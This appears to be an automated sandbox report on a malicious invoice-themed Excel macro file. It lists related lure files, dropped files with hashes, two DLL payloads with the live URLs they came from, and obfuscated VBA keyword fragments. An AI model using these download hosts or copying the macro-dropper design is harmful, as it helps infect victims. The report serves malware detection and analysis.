eb88d0b3e1961a0562f006e5ce2a0b87 | INV8222874744_20210111490395.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | Inv0209966048-20210111075675.xls | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | INV2680371456-20210111889374.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | INV8073565781-20210111319595.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | INV3867196801-20210111675616.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | INV9698791470-20210111920647.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | INV7693947099-20210111388211.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | Document74269.xls | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | Document74269.xls | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1 Total New Invoices-Monday December 14 2020.xls | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1-Total New Invoices Monday Dec 14 2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | 1 Total New Invoices-Monday December 14 2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | SecuriteInfo.com.Heur.15645.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | Statement_1857_of_12_09_2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | Statement_9505_of_12_09_2020.xlsm | Get hash | malicious | Browse | 221.126.244.72
eb88d0b3e1961a0562f006e5ce2a0b87 | MSC printouts of outstanding as of 73221_12_09_2020.xlsm | Get hash | malicious | Browse | 221.126.244.72

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                Category:dropped
                Size (bytes):58936
                Entropy (8bit):7.994797855729196
                Encrypted:true
                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                MD5:E4F1E21910443409E81E5B55DC8DE774
                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                Malicious:false
                Reputation:high, very likely benign file
                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:data
                Category:dropped
                Size (bytes):326
                Entropy (8bit):3.1109170251425975
                Encrypted:false
                SSDEEP:6:kKtOCkswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lkvkPlE99SNxAhUegeT2
                MD5:70222C6F424176083DF9D142305C388D
                SHA1:16BDB1F194CB9C851F7F142A5E0C49BF28EC75E6
                SHA-256:1F42CB7853F61BD7BE3FC20A7A9557D74A86C481A5BE56D96B602B047A548EC5
                SHA-512:DDD098536C4A1D01F4FB12B08B7CB649DC5EDC943E307F064CE194DBACF5D8D0CA66317629C4453468558D3D14D13EC1E22A3B9A0EED99C7EB1FCBD445E1B2B4
                Malicious:false
                Reputation:low
                Preview: p...... ...........1....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):303616
                Entropy (8bit):7.173739056148852
                Encrypted:false
                SSDEEP:6144:91IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:3IxO02Srnh0qEJC+Y2wbU
                MD5:9D545901D0F097F3995762EAE2BAAACD
                SHA1:4DFF3D52AD63E0351C0173EC49C41C289A5B0694
                SHA-256:015393180808B8E9A7014D3C481339D8D09B1F9C072243A03F50EC646401D9E6
                SHA-512:2C90CD2EC937282A4C2D54F31A1C84BE5F3629C24218D829455B09A922F0F8E98233BC9F6B7D9D1E0BB9B3BCB879ABF17911F00369DFDAF00381FC5CA466D12C
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                IE Cache URL:http://oudtshoornpharmacies.co.za/dyu828kp.rar
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.._...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):303616
                Entropy (8bit):7.17372835806407
                Encrypted:false
                SSDEEP:6144:O1IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:wIxO02Srnh0qEJC+Y2wbU
                MD5:49225E5732E699224519E72E24A0CCEF
                SHA1:60D908C755D29ECDB5C10C772D622BAFC6C0AB10
                SHA-256:64FE6B2469357E938A49111BD59C45AF02EDB2A5D7D6E5D856C100416122934C
                SHA-512:F5A3D95C89A32DBB6738A318E44B8F24B5A3D5D04A9E8DF1231AF0BAB06A42A9C59D2738A13348B94E9A8F46B16D738CC988A8753933CB0854A9A71E4445D559
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                IE Cache URL:http://bipolarmalta.mccarthy.ws/lpxtpiw.zip
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\272CF97F.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1408
                Entropy (8bit):2.270567557934206
                Encrypted:false
                SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                MD5:40550DC2F9D56285FA529159B8F2C6A5
                SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                Malicious:false
                Reputation:moderate, very likely benign file
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46184574.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 496 x 323, 8-bit colormap, non-interlaced
                Category:dropped
                Size (bytes):3964
                Entropy (8bit):7.60022097759879
                Encrypted:false
                SSDEEP:96:92FNKTOG5bPwCtYa4Fj/kO7JkJVnirez/Bd/TvQnU:92Fs5nN4FJOT77BJoU
                MD5:09CDFBE08B9DEEA66139F9BFF5892C40
                SHA1:B9EA3B8EC0598C235F65724ED5CAF2B263C03C6E
                SHA-256:A11153E9FBA72D4606E6FF6ACDF7CBFDC7D720A3565EAC5967BDB7DADAC4811C
                SHA-512:5249E3AFD0388CF645BF5B885302F48D42FD7383CE305599D6686F536CAC2023C136B0F2A9AD95629398B8060D5A015E01695A388384F3571B454C8F12E08FA7
                Malicious:false
                C:\Users\user\AppData\Local\Temp\Cab7485.tmp
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                Category:dropped
                Size (bytes):58936
                Entropy (8bit):7.994797855729196
                Encrypted:true
                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                MD5:E4F1E21910443409E81E5B55DC8DE774
                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                Malicious:false
                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):241332
                Entropy (8bit):4.206794602363457
                Encrypted:false
                SSDEEP:1536:cGPLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cSNNSk8DtKBrpb2vxrOpprf/nVq
                MD5:8FFE6C5816E277B3D88F5F21A8EEB8D4
                SHA1:23E9AE38C85040A9FE107C3B078B1F4C11AF7FFB
                SHA-256:3B8D72D6D2E5EA213B26246F3EB991768ADC4EBF217CFD88889F7788662A5ECD
                SHA-512:EFCC9DBEB3661BAA975DB414CCF7E2E1095000A6DC30B1BD5E1A741133A3DD8230D958E66D80315069624CEC537047DE8F98728C3960E62440FFB31C7CDDB5F7
                Malicious:false
                C:\Users\user\AppData\Local\Temp\FDFE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):61899
                Entropy (8bit):7.86043889084538
                Encrypted:false
                SSDEEP:1536:hwEi+x8IYjqmC7n05w2nrjmSJ1K2OopeCDWiHqi+S9OnJXAGFqHR:hwET8DjlDySmIzFeCSiH3EnSxR
                MD5:5D4890B1F10A2264A9CDF62A7A9E932D
                SHA1:2982D9ACFAE45469F250604B38E639E356289F37
                SHA-256:5BD7F9A2EE250F8B8E26B114434001F0AE04B8B213174823783E5FDE3E7E134E
                SHA-512:5BCFFCBB565E088DEF347BB2D778E1CD3F76F6DBBCFCD1915A407F4F29EA231E8F8E0B57BDC94B9299C3B34005A6D2371B77859F1DA9AAE7AA60624B816B8623
                Malicious:false
                C:\Users\user\AppData\Local\Temp\Tar7486.tmp
                Process:C:\Windows\SysWOW64\regsvr32.exe
                File Type:data
                Category:modified
                Size (bytes):152533
                Entropy (8bit):6.31602258454967
                Encrypted:false
                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                MD5:D0682A3C344DFC62FB18D5A539F81F61
                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                Malicious:false
                C:\Users\user\AppData\Local\Temp\ndrztpo.dll
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):303616
                Entropy (8bit):7.173739056148852
                Encrypted:false
                SSDEEP:6144:91IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:3IxO02Srnh0qEJC+Y2wbU
                MD5:9D545901D0F097F3995762EAE2BAAACD
                SHA1:4DFF3D52AD63E0351C0173EC49C41C289A5B0694
                SHA-256:015393180808B8E9A7014D3C481339D8D09B1F9C072243A03F50EC646401D9E6
                SHA-512:2C90CD2EC937282A4C2D54F31A1C84BE5F3629C24218D829455B09A922F0F8E98233BC9F6B7D9D1E0BB9B3BCB879ABF17911F00369DFDAF00381FC5CA466D12C
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                C:\Users\user\AppData\Local\Temp\pgjasrqd.dll
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):303616
                Entropy (8bit):7.17372835806407
                Encrypted:false
                SSDEEP:6144:O1IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9HQowUX:wIxO02Srnh0qEJC+Y2wbU
                MD5:49225E5732E699224519E72E24A0CCEF
                SHA1:60D908C755D29ECDB5C10C772D622BAFC6C0AB10
                SHA-256:64FE6B2469357E938A49111BD59C45AF02EDB2A5D7D6E5D856C100416122934C
                SHA-512:F5A3D95C89A32DBB6738A318E44B8F24B5A3D5D04A9E8DF1231AF0BAB06A42A9C59D2738A13348B94E9A8F46B16D738CC988A8753933CB0854A9A71E4445D559
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 13 23:38:54 2021, atime=Wed Jan 13 23:38:54 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.469266406019514
                Encrypted:false
                SSDEEP:12:85QICLgXg/XAlCPCHaXgzB8IB/g9X+WnicvbVbDtZ3YilMMEpxRljKVTdJP9TdJ2:85vU/XTwz6IQYeFDv3q8rNru/
                MD5:C1C366ED2708962587157FFA9E8A8FC4
                SHA1:792280E5B176CA566A1AE76580914AA9BCAD8F4F
                SHA-256:95310528EDEB00D8AAD1AE97AA6E657474593F1A9420709D74C9B7638177232C
                SHA-512:AB5CF4CFF97F6D752D9B7D288B619CC44023E1C0F74AA3F09D42A957B1A659ECD90132395CEC57D7998384D351152835B0932C15D4CF3A6DAF200B2AE0A59B79
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):106
                Entropy (8bit):4.390245389988799
                Encrypted:false
                SSDEEP:3:oyBVomxWdxUPITOhVdUPITmxWdxUPITv:djuSLW4S0
                MD5:37891FF049405BB442FCFD7FF79CC0CE
                SHA1:B1E3919208707AD6A480BE0B49A2DCFF9704AA3A
                SHA-256:9F7AB8A5295E2D636E3CAB3C2DCB7FC07CD9870F6099B188A55F462D43E7994D
                SHA-512:D9431FA09546D4A1EE59B3FC8F347107EA4D49DE99A1FC557B0FD3E8A255EC3BF05A6FBBEA9D1E6CA97592436082A0F6B7272B1741CD6C63FFDAFAD275A1DCDD
                Malicious:false
                Preview: Desktop.LNK=0..[misc]..sample20210113-01.LNK=0..sample20210113-01.LNK=0..[misc]..sample20210113-01.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample20210113-01.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jan 13 23:38:54 2021, atime=Wed Jan 13 23:38:57 2021, length=61904, window=hide
                Category:dropped
                Size (bytes):2108
                Entropy (8bit):4.50887990469077
                Encrypted:false
                SSDEEP:48:8U5b/XT3IkCl/KblH8Qh2U5b/XT3IkCl/KblH8Q/:8U5/XLIkp8Qh2U5/XLIkp8Q/
                MD5:FD6BFCF56800ACACE67B365206269AAF
                SHA1:D3DCF4677AA0D31CD2A2B9770BF3483D2E1D56C1
                SHA-256:2DE0F4FDA49776477D90C950F73E61A569A002210A6D3F252EBAFC410C74A6EA
                SHA-512:FCF0CA29057EC13B0FE392309998DE5FA825F1EE41C8DBD958B0E0DDB4D4A86A969A252591582C4E0E88F3B0E5AA6C2EF2FD761E14CC5D07FC60F58B51941B46
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WBLPQVYT.txt
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text
                Category:downloaded
                Size (bytes):117
                Entropy (8bit):4.420599948060351
                Encrypted:false
                SSDEEP:3:GmM/nABVdppsxBWGPVYSURoMK0cSNsW3dmvkWr6RUL/n:XM/AD5sHDMRaCtmL0UL/n
                MD5:264B69988F1EC377B5BA624DD6E1FD81
                SHA1:5AB0AD3058CD6286511B22BA4DA242F129AAA8BC
                SHA-256:B2ED535313C3E12528FEE32EE2A86EF2B757358F8E91CC39E1DCE1B7EA415984
                SHA-512:CE417FB1FF1CEC35A85B212C7802099F48AA05800DEA53AC5F3BD71E14D80AC8339C0C34A23EE433FA983A1FB189D7AD1CCE08C56FEE6EFDF111AA95EB5147CF
                Malicious:false
                IE Cache URL:invoteqleads.com/
                Preview: __cfduid.d24425c38282fae9d3f801a2e53842d3c1610552347.invoteqleads.com/.9728.855433088.30867797.2738363972.30861837.*.
                C:\Users\user\Desktop\EF0F0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):61904
                Entropy (8bit):7.860717323686253
                Encrypted:false
                SSDEEP:1536:hOde+x8IYjqmC7n05w2IdtwlvRwRwUxiFJXAGFqXYE:h0f8DjlDyJTwgRSSR5
                MD5:BEE18E0E9DCAFB36583D4FEE74EBF52A
                SHA1:41D4B669E6B0F091230914EBFC4A08921E3868F9
                SHA-256:BF825432224A2A46D0D9F3AF3CCF72A3BB2824BB7BB8105F051F0218DF11F861
                SHA-512:3978F620C2134321EBBFE8C5DAD57765E1C9325EEC416F28B5D27705BCB30EA499FF411AF76E959D58A66336CE30EB779069FBE8C5C2E683FD4FEAB4080E593A
                Malicious:false
                C:\Users\user\Desktop\~$sample20210113-01.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.781495931219212
                TrID:
                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                • ZIP compressed archive (8000/1) 7.58%
                File name:sample20210113-01.xlsm
                File size:45428
                MD5:b777540ad31de24618cb9818debb2fd4
                SHA1:6e18fab506aefe0e1d1bdbb7bf61963075a4db61
                SHA256:39c47b42df4d66fe9b9e4cb03f486a6a8a11770010dd6537c55d2899b2e2021a
                SHA512:907ca45f11527b8446f00e79268e1f03817c0fb7097965cb69267ec82f25eeddec64651e4c2079f8a7661404549e26230ee4cd35633fda96af8f664ea0f05a68
                SSDEEP:768:fwmj1m7XneIlWuYLyhtXgfqxUb7+7SAh0lTPdVGki+FVqiZ8z:fjurlWoAqxWASyijGOqiZ8z
                File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:2

                OLE File "/opt/package/joesandbox/database/analysis/339173/sample/sample20210113-01.xlsm"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Author:
                Last Saved By:
                Create Time:2020-12-07T14:38:21Z
                Last Saved Time:2021-01-13T12:13:43Z
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0300

                Streams with VBA

                VBA File Name: Module1.bas, Stream Size: 3211
                General
                Stream Path:VBA/Module1
                VBA File Name:Module1.bas
                Stream Size:3211

                VBA Code Keywords

                Keyword
                redline(Oa))))
                ellysio
                Sheets(ol).Cells(ellysio,
                Integer:
                "listP_"
                VB_Name
                String
                homedep
                Error
                redline(yel
                Integer)
                "ab")
                Function
                ellysio()
                "!"):
                "ab":
                Split(govs,
                Randomize:
                Integer
                ol).UsedRange.SpecialCells(xlCellTypeConstants)
                ol).value
                homedep(nimo
                Wscript.echo
                nimo(Int((UBound(nimo)
                Replace(Vo,
                ViiM(sem.value)
                Chr(sem.Row)
                ol).Name
                redline(ellysio))
                Split(kij(ol),
                Next:
                Variant)
                Rnd))
                Attribute
                Resume
                redline
                Sheets(ol
                Run(""
                VBA Code
                VBA File Name: Sheet1.cls, Stream Size: 1623
                General
                Stream Path:VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:1623

                VBA Code Keywords

                Keyword
                Index
                VB_Name
                VB_Creatable
                Application.OnTime
                VB_Exposed
                Long)
                "mi_"
                VB_Customizable
                VB_Control
                MultiPage"
                VB_TemplateDerived
                MSForms,
                False
                Attribute
                Private
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VBA Code
                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                General
                Stream Path:VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:999

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Name
                VB_Creatable
                "ThisWorkbook"
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                VBA Code

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 542
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:542
                Entropy:5.22322002043
                Base64 Encoded:True
                Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 1 4 3 B 2 3 2 B 6 3 2 B 6 3 2 B 6 3 2 B 6 " . . D P B = " 8 2 8 0 7 1 3 2 B 3 3 3 B 3 3 3 B 3 " . . G C = " C 3
                Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:86
                Entropy:3.24455457963
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3558
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:3558
                Entropy:4.423627705
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
